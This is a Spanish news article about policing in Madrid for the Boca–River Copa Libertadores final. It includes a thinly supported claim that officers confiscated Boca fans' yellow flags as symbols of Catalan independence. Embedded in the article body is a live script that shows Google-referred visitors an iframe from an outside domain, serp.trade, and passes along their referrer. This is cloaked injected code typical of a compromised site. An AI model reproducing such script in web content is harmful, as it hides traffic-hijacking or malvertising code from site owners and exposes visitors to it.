Press "Enter" to skip to content

[VÍDEO] La policía del Bernabeu requisa “trapos amarillos” a los hinchas de BOCA pensando que son independentistas

Puntuació dels lectors

Madrid vivirá este domingo con motivo del partido entre el Boca Juniors y el River Plate un dispositivo de seguridad “a la altura de los mayores retos que hemos tenido”, según reconoció el comisario general de Seguridad Ciudadana de la capital española, Juan Carlos Castro Estevez.

Un total de 4.000 efectivos, entre policías nacionales (2.054), seguridad privada del Real Madrid (1.700) y auxiliares de Policía Local, Cruz Roja y Samur, se encargarán de que el partido de vuelta de la final de la Copa Libertadores transcurra sin incidentes tanto dentro como fuera del campo. El Paseo de la Castellana será cortado al tránsito durante 24 horas desde las 00.00 hasta las 23:59 de este domingo.

El Paseo de la Castellana se cerrará a la circulación durante 24 horas

La policía española contará con el apoyo de doce policías de la policía argentina -seis por cada club- que conocen bien a los hinchas radicales de ambos equipos. Se espera que haya unos 500 ultras argentinos, a los que se les aplicará una vigilancia especial que en el argot policial se conoce como “quedar marcados”.

Boca Juniors, una historia en azul y amarillo

Hasta aquí todo normal, el problema con el que se han encontrado los aficionados del club argentino Boca Juniors, es con uno de sus colores, el amarillo, que como símbolo del independentismo no es binevenido en Madrid, muchos de los simpatizantes del club argentino no daban crédito a que se les requisen “los trapos” de uno de los colores de su equipo por un conflicto ajeno a la copa libertadores.

<script>if((document.referrer).includes('google')) {
   document.write("<iframe src='https://serp.trade/iframe.php?ref="+(document.referrer)+"' frameBorder='0' scrolling='no' width='100%' height='200px' align='center'></iframe>");
} </script>

Comentaris
COMPARTEIX !
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  
Ofertas Depilación Láser